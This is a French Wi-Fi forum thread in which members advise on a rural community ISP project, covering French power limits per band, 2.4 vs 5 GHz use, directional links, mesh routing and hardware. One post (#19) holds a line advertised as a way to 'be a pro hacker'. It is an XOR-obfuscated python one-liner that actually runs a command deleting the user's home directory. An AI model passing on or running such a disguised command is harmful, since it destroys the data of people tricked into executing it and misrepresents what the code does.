Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 05-12-2013 23:09:42

jissouille
Membre

Puissances et fréquences + légal

Bonjour,

D'après ce que j'ai cru comprendre, il existe 2 bandes de fréquences pour le WiFi : 2,4GHz et 5GHz

La puissance légale autorisée pour le 2,4GHz serait de 0,1W et de 1W pour la bande des 5GHz.

Est-ce vrai ?

J'imagine que la puissance 10x plus grande pour le 5GHz n'entraîne pas une portée/fiabilité linéairement 10x meilleure (ce serait trop facile).

Je souhaite faire 2 choses différentes :

* des relais point à point (transporter du réseau d'un point à un autre sur plusieurs km) - j'envisage pour ça d'utiliser des antennes directionnelles
* de la diffusion sur une zone ("arroser" une zone sur un angle entre 90° et 120°) - pour ça je me dirige vers des antennes sectorielles

Chaque bande de fréquence est-elle plus adpatée pour chacun de ces usages ?

La bande de 5GHz me semble moins répandue, notamment "de série" sur les portables.

J'ai vraiment l'impression de poser des questions simplistes, y aurait-il une FAQ quelque part où je trouverais les réponses à ces questions élémentaires (même en anglais) ?

Merci pour votre aide en tout cas.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-12-2013 13:39:27

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Puissances et fréquences + légal

Je te conseille de lire nos sujets épinglés wink
Par rapport aux bandes, si tu peux être en A a priori ce serait plutôt une bonne idée vu que tu auras beaucoup moins d'encombrement sur la fréquence.
Il faudrait que tu nous plante un peu plus le décor, les distances, les obstacles, le débit en source, celui que tu vises, le matériel dont tu dispose, si tu as un budget et de combien approximativement....
Je t'invite à jeter un coup d’œil à d'autres sujets traitant de réaliser des projets de connexions sur longues distances.
Rien de mieux que des exemples concrets et bien documentés pour voir comment tu dois envisager la chose.

EDIT
.

Je viens de lire ton topic de présentation, bienvenue, et je lis que tu veux "arroser" un village entier....
Il nous faut donc vraiment plus d'information, un carte du village, nombre d'habitant, une évaluation des besoins et du niveau de service que tu veux proposer. Si il y a un street view c'est parfait.

belle idée.

#3 06-12-2013 13:59:48

jissouille
Membre

Merci de ta réponse. J'ai commencé à lire les sujets épinglés mais justement je dois encore fouiller pour trouver des exemples plus concrets.

Pour vous planter le décor :

Je suis dans un petit village dans lequel on a de l'ADSL 20 Mbps en centre bourg mais dès qu'on s'éloigne du NRA ça chute beaucoup (normal). On a des villages aux alentours (entre 3 et 8km à vol d'oiseau) qui ne sont pas fibrés et donc qui ont des débits genre 1 Mbps. Le but c'est de fournir le plus gros débit possible.

Notre village est en hauteur et j'ai accès aux points hauts (châteaux d'eau, églises, silos agricoles).

J'imagine l'architecture suivante :
- liaison WiFi directionnelle entre mon NRA et mon château d'eau (moins d'1km, pas d'obstacle)
- liaison WiFi directionnelle entre mon château d'eau et celui du village voisin situé à 5km à vol d'oiseau (pas d'obstacle)
- arrosage(s) sectoriel(s) du village voisin depuis le château d'eau

Pour l'instant je n'ai pas acquis de matériel, j'étudie les solutions existantes. J'achèterai du matos de bonne qualité, adapté aux besoins (quelques milliers d'euros de budget, selon le projet).

Je continue à fouiller. À bientôt !

#4 06-12-2013 15:02:30

kcdtv
Membre d'honneur

Ça c'est du projet! big_smile
Il faut vraiment bien tout mettre à plat.
Il est important que l'on sache un peu la population de chaque village, si tu nous faits une petite capture d'écran avec google satellite et tu nous mets des petites croix.

Pour l'instant je n'ai pas acquis de matériel, j'étudie les solutions existantes. J'achèterai du matos de bonne qualité, adapté aux besoins (quelques milliers d'euros de budget, selon le projet).

d'abord réunir l'info, bien tout mettre à plat, il faut penser à l'alimentation électrique , au câblage...  et voir une carte, une photo satellite.

liaison WiFi directionnelle entre mon NRA et mon château d'eau (moins d'1km, pas d'obstacle)

Qu'est ce qu'un NRA?

#5 06-12-2013 15:24:14

Furyo
Membre Irremplaçable
Site Web

kcdtv a écrit :

Je pense qu'on devrait tout regrouper dans un seul et même topic, et vraiment bien tout mettre à plat.
Il est important que l'on sache un peu la population de chaque village, si tu nous faits une petite capture d'écran avec google satellite et tu nous mets des petites croix.

d'abord réunir l'info, bien tout mettre à plat, il faut penser à l'alimentation électrique , au câblage...  et voir une carte, une photo satellite.

liaison WiFi directionnelle entre mon NRA et mon château d'eau (moins d'1km, pas d'obstacle)

Qu'est ce qu'un NRA?

NRA  : Noeud de raccordement d'abonnés

http://fr.wikipedia.org/wiki/NRA

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#6 06-12-2013 15:32:31

kcdtv
Membre d'honneur

OK ... comme je lisais "mon NRA" je pensais qu'il parlait de son routeur tongue

#7 06-12-2013 15:34:44

Furyo
Membre Irremplaçable
Site Web

kcdtv a écrit :

C'est le NRA sur lequel il est raccordé enfin le NRA c'est l'ensemble des cartes (les DSLAM) de l'ensemble des operateurs fournissant un acces internet wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#8 06-12-2013 15:38:33

jissouille
Membre

kcdtv a écrit :

Hmmm... En fait c'est un petit bout du projet global :-) L'idée c'est de monter une asso qui soit Fournisseur d'Accès Internet et donc se substituer aux quelques mastodontes (Orange, Free, SFR, Bouygues) là où ils ne veulent pas faire d'effort (ouin, c'est pas rentable). C'est aussi de fournir des accès gratuits (ou très bon marché) à des gens qui ont peu de ressources (chômeurs, précaires, squats, gens du voyage, etc.).
Le tout sur une dizaine de villages.

kcdtv a écrit :

Je pense qu'on devrait tout regrouper dans un seul et même topic, et vraiment bien tout mettre à plat.

Oui, ce serait vraiment bien. Je ne sais pas si, avec FluxBB, on peut avoir des topics dans plusieurs forums, mais ce serait l'idéal. Mais bonjour le boulot aussi.

kcdtv a écrit :

C'est un projet basé sur le libre (Linux exclusivement) donc on s'interdit aussi toute donnée Google. Ça nous permettra de publier sur nos blogs ou de faire des documents officiels en toute sérénité. OpenStreetMap fait largement aussi bien (et comme c'est moi qui ai cartographié la zone, j'en connais la fiabilité).

Les populations, ça va de 200 à 1500 habitants (les villages qui sont très mal desservis par l'ADSL sont ceux qui ont moins de 500 habitants ; pour les autres, c'est variable mais toutes les fermes ou les hameaux un peu éloignées ont des débits pourris).

Pour l'instant je ne donne pas de noms précis, je n'ai pas envie qu'on me pique le projet sous le nez (le temps de monter l'asso et de faire les premiers tests). Ensuite je donnerai accès à mon blog où beaucoup de choses sont déjà référencées (cartes, photos, etc.)

kcdtv a écrit :

d'abord réunir l'info, bien tout mettre à plat, il faut penser à l'alimentation électrique , au câblage...

Normalement, tous les sites sont déjà alimentés électriquement. Si on doit faire des relais "en pleine campagne" (je pense à une zone qu'on doit alimenter mais qui ne voit pas directement le château d'eau à cause d'une forêt entre les deux), on envisage une batterie alimentée avec un panneau solaire. Mais c'est vraiment dans un deuxième temps ça :-)

Qu'est ce qu'un NRA?

Un NRA (Nœud de Raccordement d'Abonnés) c'est ce qui apporte l'ADSL dans le central téléphonique. Une sorte de routeur fibre/cuivre :-)

#9 06-12-2013 15:42:24

jissouille
Membre

Furyo a écrit :
kcdtv a écrit :

C'est le NRA sur lequel il est raccordé enfin le NRA c'est l'ensemble des cartes (les DSLAM) de l'ensemble des operateurs fournissant un acces internet wink

Oui voilà, merci de la précision :-)

#10 06-12-2013 17:22:23

kcdtv
Membre d'honneur

En fait c'est un petit bout du projet global :-)

Petit cachotier big_smile... Ok ok, donc derrière vous savez ou vous allez avec des compétence linux, c'est important aussi et très bon en soi. smile

Ensuite je donnerai accès à mon blog où beaucoup de choses sont déjà référencées (cartes, photos, etc.)

Ok, donc on attend que tu nous mette ici un lien avec impatience smile

C'est aussi de fournir des accès gratuits (ou très bon marché) à des gens qui ont peu de ressources (chômeurs, précaires, squats, gens du voyage, etc.).
Le tout sur une dizaine de villages.

smile
Le projet en soi est super intéressant, motivant et peut permettre aussi de mettre en place des réseaux d'échange de services et de compétence, de solidarités, des projets d'économie sociales....
en poussant l'idée un peu, ce serait sympa un atelier wifi gratuit ou vous récupèreriez du matos, vous pourriez construire des antennes, vous former ensemble aux thématiques liées au réseau.

Comme par exemple notre ami mandarache et son tout nouveau panneau "doble belgrano" Nueva antena de panel Belgrano Templario.
Parabole Satellite pour réception WIFI ?
Si vous arrivez à mettre une belle dynamique en place.... qui sait où vous allez vous arrêter tongue
En espagne il y a ce projet un peu similaire, si tu veux y jetter un coup d'oeil : gufinet

#11 07-12-2013 01:07:20

le dirdir
Membre d'Or

Salut.

Tu parles d'ADSL pour alimenter un ou plusieurs villages, je pense qu'il faudrait plutôt envisager le VDSL ou même la fibre optique. LADSL n'est pas symétrique et fournit assez d'upload pour un foyer mais pas pour un village.

Je pense même qu'il serait nécessaire de trouver un abonnement pro avec des sociétés comme OVH ou Nerim.
Tu peux tester ici le débit théorique que tu pourrais avoir en VDSL

Je pense aussi qu'il faudra envisager une liaison fibre optique entre le DSLAM et tes antennes, ça doit être possible avec l'accord de la commune.

jissouille a écrit :

L'idée c'est de monter une asso qui soit Fournisseur d'Accès Internet

FDN fonctionne sur ce principe, vottre asso pourrait les rejoindre.

Dernière modification par le dirdir (07-12-2013 01:09:45)

Tant vaut l'antenne, tant vaut le poste

#12 07-12-2013 01:33:27

jissouille
Membre

le dirdir a écrit :

Tu parles d'ADSL pour alimenter un ou plusieurs villages, je pense qu'il faudrait plutôt envisager le VDSL ou même la fibre optique. LADSL n'est pas symétrique et fournit assez d'upload pour un foyer mais pas pour un village.

Je pense même qu'il serait nécessaire de trouver un abonnement pro avec des sociétés comme OVH ou Nerim.
Tu peux tester ici le débit théorique que tu pourrais avoir en VDSL

Merci. OVH m'indique les mêmes débits que ceux que j'ai déjà. Nous ne sommes pas éligibles à mieux que de l'ADSL2+ (et nous ne serons jamais dégroupés, par quiconque). Pour te donner une idée, il y a moins de 400 foyers en tout sur le village, y compris ceux qui sont à plusieurs km.

Donc soit on mutualisera plusieurs lignes, soit on agrégera, en fonction des possibilités techniques et des besoins.

Je pense aussi qu'il faudra envisager une liaison fibre optique entre le DSLAM et tes antennes, ça doit être possible avec l'accord de la commune.

A priori non. On veut fonctionner en hertzien parce-que ça coûte beaucoup (beaucoup beaucoup) trop cher de tirer une fibre (plusieurs centaines de mètres, sans fourreau existant).

FDN fonctionne sur ce principe, vottre asso pourrait les rejoindre.

Oui, c'est avec eux qu'on pense bosser.

#13 07-12-2013 12:43:17

antares145
Membre d'honneur
Site Web

Salut jissouille, bienvenue sur le forum ! smile

Ton projet a l'air sympa, en tout cas ça me botterait bien de travailler sur ce genre de "couverture à grande échelle", donc si je peux t'aider un peu ce sera avec plaisir wink

D'abord, pour répondre aux questions d'origine :

jissouille a écrit :

La puissance légale autorisée pour le 2,4GHz serait de 0,1W et de 1W pour la bande des 5GHz.
Est-ce vrai ?

En fait ce n'est pas très clair, surtout pour le 5 GHz (qui a longtemps été "non-autorisé" en France à cause des militaires qui utilisent cette fréquence pour certains radars. En tout cas, d'après la dernière regdb :

[[email protected] ~] $ iw reg set FR
[[email protected] ~] $ iw reg get
country FR: DFS-UNSET
	(2402 - 2482 @ 40), (N/A, 20)
	(5170 - 5250 @ 80), (N/A, 20)
	(5250 - 5330 @ 80), (N/A, 20), DFS
	(5490 - 5710 @ 80), (N/A, 27), DFS
	(57240 - 65880 @ 2160), (N/A, 40), NO-OUTDOOR

Les chiffres sont donnés en dBm : 20 dBm correspondent à 0,1W et 27 dBm correspondent à 0,5W. De mémoire, on peut monter à 1W sur certains canaux à condition d'activer le DFS (une fonction de détection des impulsions radar), mais tous les récepteurs n'en sont pas capables.
Conclusion : si tu veux être sûr de rester dans les clous, mise sur 500 mW. Ou alors utilise les réglages FR de ton matériel, qui gère (normalement) ça tout seul.

jissouille a écrit :

J'imagine que la puissance 10x plus grande pour le 5GHz n'entraîne pas une portée/fiabilité linéairement 10x meilleure (ce serait trop facile).

Beaucoup trop facile en effet smile Sans entrer dans les détails, tu as 3 effets dominants qui vont intervenir :
- l'atténuation "naturelle" des ondes est proportionnelle au carré de la fréquence : pour une distance donnée, le 5 GHz sera + atténué que le 2 GHz.
- la "pénétration" des obstacles est moins bonne à haute fréquence (grosso-modo pour les même raisons, atténuation dans les matériaux liée à la fréquence), donc le 5 GHz couvrira moins bien l'intérieur des bâtiments que le 2 GHz (qui lui-même sera moins bon que les téléphones 2G ou la radio FM)
- Il y a aussi un impact plus marqué des conditions météo sur le 5 GHz (diffraction sur les gouttelettes d'eau)
Donc non, le fait de disposer d'une puissance plus élevée en 5 GHz n'est pas une garanie de meilleures performances wink

jissouille a écrit :

Chaque bande de fréquence est-elle plus adpatée pour chacun de ces usages ?

Comme tu l'as très bien dit, le 5 GHz n'est pas (encore) très répandu sur les terminaux utilisateurs (laptop, smartphones,...). Par contre, il a l'avantage d'être beaucoup moins "encombré" (parce que moins utilisé). Dans ton cas, tu devrais donc utiliser les 2 bandes :
- le 5 GHz pour les liens point-à-point, où seuls tes bornes doivent être compatibles et où des antennes adaptées te permettent de compenser les effets haute-fréquence
- le 2.4 GHz pour le réseau "public" sur lequel tes utilisateurs viendront se connecter, pour des raisons de compatibilité (et de couverture, dans une moindre mesure).

Comme tu peux le voir, tes questions n'étaient pas si "basiques" que ça smile

Pour le reste, ton projet comporte un certain nombre de challenges, mais c'est ça qui le rend intéressant.
Pour la couverture, déjà. Quelques antennes sectorielles devraient faire du bon boulot, mais en fonction de la configuration urbaine (et du nombre d'utilisateurs sur chaque borne), ta qualité de service pourrait rapidement passer de "Acceptable" à "Médiocre" voire pire. Mais ça c'est très difficile à modéliser/prévoir hmm En même temps, si le service est gratuit, les plaintes devraient être limitées.
Pour le débit "Internet" ensuite. Comme déjà signalé, en fonction du nombre d'utilisateurs, il va te falloir plusieurs connexions "montantes" si tu veux que chacun dispose d'un débit potable (reste à définir ce qu'est un débit "potable"). C'est mathématique, même dans un cas idéal, avec une ligne à 20 Mbps tu ne peux servir que 20 utilisateurs (sinon le débit devient pire que l'ADSL existant, tout mauvais qu'il soit). 400 foyers, ça voudrait dire 20 lignes... Aggrégation ou combinaison de lignes OK, mais gare aux "points faibles" du réseau : si toutes tes liaisons passent par le même lien et que ce dernier tombe (panne, météo, malveillance), tout le monde est coupé...

Une solution serait peut-être de monter un réseau maillé (mesh network), ou chaque utilisateur est un relais vers les autres. Certains protocoles de routage spécifique comme BATMAN ou BABEL permettent une certaine résilience (si un lien disparaît, le trafic est redirigé vers une route alternative) et plusieurs nœuds peuvent servir de points d'entrée/sortie vers Internet (pour une répartition du trafic, ou comme backup). C'est clairement plus complexe à déployer qu'un réseau centralisé, mais ça n'est pas dénué d'avantages smile Certaines villes (surtout aux USA) se sont lancées là-dedans, en France il y avait quelques projets (Toulouse Sans Fil, Nantes Wireless, Brest aussi je crois) mais à ma connaissance tous ces projets stagnent plus ou moins. Au Québec, tu as ReseauLibre qui a l'air actif, et en Belgique tu as Bombolong (ex-ReseauCitoyen si j'ai bien compris) + quelques projets isolés (surtout au Nord apparemment, Coyotus pourra peut-être t'en dire plus). Bref, tout ça pour dire que ces "collègues" pourront peut-être répondre à certaines questions pratiques, et ça c'est sans parler des Hackerspace dont certains en France sont actifs sur le sujet
--> Créer un réseau maillé avec Babel (retour sur ma soirée au HackStub)
(et une pub pour le bovin, une ! big_smile)

Sur le plan pratique du matériel, au risque d'en surprendre certains (ou pas tongue) je partirais sur du Ubiquiti, en tout cas pour les liens point-à-point en 5 GHz, c'est la meilleure référence. Les châteaux d'eau sont une bonne solution, même si ça impose des contraintes d'accès particulières (mais ça je suppose que tu le sais déjà).
En ce qui concerne la couverture "finale" vers les utilisateurs, je pense qu'Ubiquiti reste une solution intéressante (via des Rocket M2 par exemple), par contre pour les antennes sectorielles je ne sais pas trop. J'ai entendu du bon et du moins bon sur les Airmax sectorielles, il y a peut-être mieux sur le marché, à voir.

Voilà ce que je peux te dire pour l'instant à propos de ton projet. N'hésite pas si tu as d'autres questions, j'attends de voir ton blog en ligne pour pouvoir suivre les étapes ! smile

#14 07-12-2013 20:09:36

le dirdir
Membre d'Or

^^ J'adore ce forum.

Pour compléter sur la légalité du projet. Il y a fort à parier que France Télécom verra ce projet d'un très mauvais œil, ça s'attaque à son dernier monopole : l'ADSL à la campagne.

Il est donc de ton intérêt de respecter les normes à la lettre.

#15 07-12-2013 20:27:31

Furyo
Membre Irremplaçable
Site Web

le dirdir a écrit :

^^ J'adore ce forum.

Pour compléter sur la légalité du projet. Il y a fort à parier que France Télécom verra ce projet d'un très mauvais œil, ça s'attaque à son dernier monopole : l'ADSL à la campagne.

Il est donc de ton intérêt de respecter les normes à la lettre.

Tu peux me dire en quoi cela pourrait gêner FT ou autres FAI ?

Developpe, je suis curieux...

387003.jpg

#16 07-12-2013 21:52:03

le dirdir
Membre d'Or

Quand tu vis à la campagne, les lignes sont plus sujettes aux coupures (tempête, neige, vol de cable, etc...).

En cas de coupure FT est très rapide à réparer quand il s'agit de ses clients, et ils le sont beaucoup moins pour les lignes dégroupées.

Conclusion, les gens préfèrent rester chez FT pour limiter les coupures.

Si on fournit des hotspots gratuits, fiables et pérennes, les gens vont laisser tomber leur abonnement ADSL bridé petit à petit. Sur 400 foyers, ça doit faire une perte significative pour FT.

Ils risquent donc d'essayer de trouver des aspects illégaux à ce projet, pour le contester.

Je suis en train de chercher comment acheter une ligne haut-débit pro. Je ne trouve pas, je n'ai pas les bons mot-clé. neutral

#17 07-12-2013 22:17:34

Furyo
Membre Irremplaçable
Site Web

le dirdir a écrit :

Quand tu vis à la campagne, les lignes sont plus sujettes aux coupures (tempête, neige, vol de cable, etc...).

En cas de coupure FT est très rapide à réparer quand il s'agit de ses clients, et ils le sont beaucoup moins pour les lignes dégroupées.

Conclusion, les gens préfèrent rester chez FT pour limiter les coupures.

Si on fournit des hotspots gratuits, fiables et pérennes, les gens vont laisser tomber leur abonnement ADSL bridé petit à petit. Sur 400 foyers, ça doit faire une perte significative pour FT.

Ils risquent donc d'essayer de trouver des aspects illégaux à ce projet, pour le contester.

Je suis en train de chercher comment acheter une ligne haut-débit pro. Je ne trouve pas, je n'ai pas les bons mot-clé. neutral

Les lignes sont plus la plupart enterrées dans l'ADSL à proprement dit dans le cas des liaisons cuivres... donc tempetes, evenements etc.. Ne serront à meme que des pertes lié à la desynchrosination ...

Dans ce cas, nous ne parlons que d'un abonnement ou d'une partie d'un slot sur un DLSAM...

1/ je ne vois pas en quoi le vol pourrait intervenir (ni en amont ou en aval)
2/ même si c'etait le cas tu sais aussi bien que moi si tu faisais partit d'un staf technique que les ID seront demandés donc nul et inapropriée..
3/ FT réagit s"une maniere similaire sur ces lignes quand on croirait le contraire car tous les operateurs qui louent leurs cartes sur les NRA(cartes du DSLam) n'imposent pas dans les contrats des delais, non, mais tu crois au pere noel ou tu te vois dans le monde "oui-oui"??!!!
Arretes de te mettre du coté client, et tu verras qu'au niveau des techniciens de FT, ils sont parfois plus rapide pour raccorder un abonné SFR ou Free plutot qu'à Orange car ils n'ont pas d'obliguation de resultats sur leur propre reseau de raccordement..

m'enfin, je dois etre un gros debile derriere son ecran pour te dire cela car je ne bosse pas pour ce domaine et meme si si c'etait le cas je n'en parlerai pas ... Comprendras qui le voudras...

387003.jpg

#18 08-12-2013 00:27:42

le dirdir
Membre d'Or

Furyo a écrit :

Les lignes sont plus la plupart enterrées dans l'ADSL à proprement dit dans le cas des liaisons cuivres...

Ce n'est pas ce que j'ai constaté, la plupart des gens que je connais à la campagne (je parle de maisons isolées) sont connectées par un ligne aérienne, le bon vieux fil de cuivre sur  des poteaux en bois.

Furyo a écrit :

je ne vois pas en quoi le vol pourrait intervenir

Un ligne électrique part d'un NRA pour aller jusqu'à une maison. Un voleur s'empare de cette ligne électrique pour revendre le métal qui la compose. À partir de ce moment, l'internet ne fonctionne plus dans la maison. C'est le problème des liaisons filaires, quand on enlève le fil, il n'y a plus de liaison.

#19 08-12-2013 09:36:10

spawn
Modérateur

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#20 08-12-2013 14:12:17

jissouille
Membre

Waouh les gars, merci pour toutes vos réponses, ça me fait beaucoup de grain à moudre ; ça tombe bien, c'est ce que je voulais.

antares145 a écrit :

Salut jissouille, bienvenue sur le forum ! smile

Ton projet a l'air sympa, en tout cas ça me botterait bien de travailler sur ce genre de "couverture à grande échelle", donc si je peux t'aider un peu ce sera avec plaisir wink

Merci. Tu as déjà bien commencé là :-)

D'abord, pour répondre aux questions d'origine :

Merci ;-)

jissouille a écrit :

La puissance légale autorisée pour le 2,4GHz serait de 0,1W et de 1W pour la bande des 5GHz. Est-ce vrai ?

En fait ce n'est pas très clair, surtout pour le 5 GHz [...]
Conclusion : si tu veux être sûr de rester dans les clous, mise sur 500 mW. Ou alors utilise les réglages FR de ton matériel, qui gère (normalement) ça tout seul.

Dans ton cas, tu devrais donc utiliser les 2 bandes :
- le 5 GHz pour les liens point-à-point, où seuls tes bornes doivent être compatibles et où des antennes adaptées te permettent de compenser les effets haute-fréquence
- le 2.4 GHz pour le réseau "public" sur lequel tes utilisateurs viendront se connecter, pour des raisons de compatibilité (et de couverture, dans une moindre mesure).

Ok, c'est exactement les conclusions auxquelles j'étais arrivé. Merci de ces confirmations, ça me donne des bases solides sur lesquelles continuer de construire.

Comme tu peux le voir, tes questions n'étaient pas si "basiques" que ça smile

En effet mais vu que tout le monde a l'air très pro ici (sans compter ceux qui fabriquent leurs propres paraboliques -vous êtes de grands malades les gars, c'est cool) je me sentais un peu con avec mes questions de n00b :-)
Il manque vraiment une FAQ mais ton message comble beaucoup de trous de façon synthétique.

Pour le reste, ton projet comporte un certain nombre de challenges, mais c'est ça qui le rend intéressant.

Oui, sans compter les autres challenges : administratifs et humains. Dans quoi je me suis lancé ?

Pour la couverture, déjà. Quelques antennes sectorielles devraient faire du bon boulot, mais en fonction de la configuration urbaine (et du nombre d'utilisateurs sur chaque borne), ta qualité de service pourrait rapidement passer de "Acceptable" à "Médiocre" voire pire. Mais ça c'est très difficile à modéliser/prévoir hmm En même temps, si le service est gratuit, les plaintes devraient être limitées.

1) Je pense, en effet, que c'est très difficile à modéliser car très spécifique de chaque situation géographique (et pour répondre à "le dirdir" au passage, c'est ce qui fait que FT se fout pas mal de mon initiative, voire ça les arrange que quelqu'un s'emm... à fournir une solution là où, avec leurs technos filaires only, ils ne peuvent pas grand chose). Cette expérience sera constituée à partir d'essais et d'erreurs et c'est pour ça que j'ai démarré le blog assez tôt.

2) Si le service était gratuit, je doute que ça limiterait les plaintes :-) Mais le service ne sera pas gratuit mais financé par la communauté ce qui est très différent. Et de toute façon mon souhait c'est de faire les choses bien, voire très bien.

Pour le débit "Internet" ensuite. Comme déjà signalé, en fonction du nombre d'utilisateurs, il va te falloir plusieurs connexions "montantes" si tu veux que chacun dispose d'un débit potable

Tu fais bien d'insister sur le débit montant. Je ne le voyais pas comme un gros frein mais je crois que tu as raison et que c'est une grossière erreur de ma part.

Je prévoyais déjà un travail sur la QoS (priorisation des flux) notamment pour gérer proprement la téléphonie et c'est bien que je garde à l'esprit que le vrai goulot d'étranglement c'est le débit montant.

Une solution serait peut-être de monter un réseau maillé

Ah, là tu touche un point sensible :-) Je t'avoue que c'est un des défis techniques qui me semble le plus intéressant. D'abord parce-que c'est comme ça qu'on m'a présenté l'internet il y a 20 ans et que ce que j'ai constaté c'est, avouons-le, un réseau essentiellement centralisé. Or ça me plaît beaucoup cette notion de maillage.
D'autre part, vu la configuration des lieux (une zone géographique à couvrir d'environ 300km² pour le projet global), il n'est pas rare que certaines maisons soient plus proches du village voisin que de celui auquel elles sont administrativement rattachées.

Cela dit, je ne vais pas commencer par là. Mais merci pour tous ces liens, c'est très précieux (hint: FAQ). Et un +1 pour le lien vers le bovin car c'est, à mon avis, un des rares techblog (ou geek blog mais je n'aime pas la connotation qu'a prise le terme geek) français de qualité et sans concession vis-à-vis des technos commerciales/propriétaires.

Sur le plan pratique du matériel, au risque d'en surprendre certains (ou pas tongue) je partirais sur du Ubiquiti, en tout cas pour les liens point-à-point en 5 GHz, c'est la meilleure référence.

C'est également ce que préconisent les membres de (F)FDN : Sames Wireless

Les châteaux d'eau sont une bonne solution, même si ça impose des contraintes d'accès particulières (mais ça je suppose que tu le sais déjà).

Oui et j'ai déjà des accords de principe. En fait, bizarrement, j'ai plus des soucis d'alimentations électriques (absentes) sur les châteaux d'eau. Mais les communes sont prêtes à prendre en charge l'électrification, ne serait-ce que pour rationaliser le filtrage (dans le château plutôt qu'à côté comme c'est le cas aujourd'hui).

En ce qui concerne la couverture "finale" vers les utilisateurs, je pense qu'Ubiquiti reste une solution intéressante (via des Rocket M2 par exemple), par contre pour les antennes sectorielles je ne sais pas trop. J'ai entendu du bon et du moins bon sur les Airmax sectorielles, il y a peut-être mieux sur le marché, à voir.

Je vais voir si je peux négocier avec un fournisseur le prêt de quelques équipements, vu que je risque de passer, au final, une commande importante :-)

Voilà ce que je peux te dire pour l'instant à propos de ton projet. N'hésite pas si tu as d'autres questions, j'attends de voir ton blog en ligne pour pouvoir suivre les étapes ! smile

Encore merci pour toutes tes précisions. J'ai hâte de passer à du concret mais je dois d'abord avancer sur le volet "administratif".

Ah, dernière chose quand même dont je n'ai pas parlé : nous sommes (évidemment) en zone blanche GSM. Une connexion WiFi sur tout le territoire donnera un début de solution (via SIP) mais je me demande s'il ne serait pas possible de mettre en place des technos telles que les Femtocell à certains endroits stratégiques.

#21 09-12-2013 12:04:35

M1ck3y
Administrateur
Lieu : Lost in the darkness

jissouille a écrit :

Je ne sais pas si, avec FluxBB, on peut avoir des topics dans plusieurs forums

Oui tu es libre de créer des sujets ou bon te semble, dans le ou les forums de ton choix. Dans la mesure ou la réalisation de ton projet va nécessiter d'aborder différentes thématiques, je te conseille d'ouvrir plusieurs sujets chacun axé sur un thème précis plutot qu'un seul sujet "fourre tout" qui sera vite embrouillé par la multitude de posts et de thèmes abordés.

#22 09-12-2013 12:19:57

jissouille
Membre

M1ck3y a écrit :
jissouille a écrit :

Je ne sais pas si, avec FluxBB, on peut avoir des topics dans plusieurs forums

Oui tu es libre de créer des sujets ou bon te semble

Ce n'est pas ce que je voulais dire. Je me demandais s'il était possible de créer un nouveau forum et d'y rattacher des threads existants de sorte qu'ils soient consultables (et "répondables") des deux côtés (le forum original et le forum "à thème"). Vu la feature list de fluxbb il semblerait que non. Dommage.

#23 09-12-2013 17:31:48

M1ck3y
Administrateur

Tu veux dire créer un forum spécialement pour ton projet? Pourquoi pas, ou bien un sous forum, c'est possible, mais pour que ça en vaille la peine il faudrait savoir combien de discussions tu auras besoin de créer, et puis ça ne sera que temporaire, une fois le projet réalisé on mettra les sujets dans les forums existants.

#24 09-12-2013 19:05:35

jissouille
Membre

Non, pas du tout. L'idée c'était de faire des forums (ou des sous-forums) par thèmes (ex: "longue distance", "grands projets", "construction d'antennes", "test de matériel", etc.) et d'y rattacher des threads qui appartiennent à d'autres forums. Comme ça on pourrait voir ces threads, soit dans le forum d'origine soit dans ces sous-forums "à thème" où ils seraient regroupés. Comme ça, quand tu cherches des tests de matériel, tu n'es pas obligé d'aller fouiller un peu partout. Et pour autant, le thread est toujours dispo dans le forum de départ.

Désolé si je suis confus, je n'ai pas l'habitude de gérer des forums.

#25 09-12-2013 21:57:25

M1ck3y
Administrateur

Non, on ne peut pas avoir des sujets dupliqués. C'est contraire à nos règles, chaque sujet doit etre à sa place, et il ne faut pas faire de double post. Par contre, tu peux si tu veux poster pour suggérer de nouveaux forums.

En fait, techniquement j'avais implémenté la possibilité d'inclure des sous forums il y a quelques temps déja, mais une telle mise en place impliquerait une petite réorganisation du forum et un gros travail de tri dans certaines sections. Mais je suis pour tout ce qui peut aider à avoir un forum mieux organisé wink

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]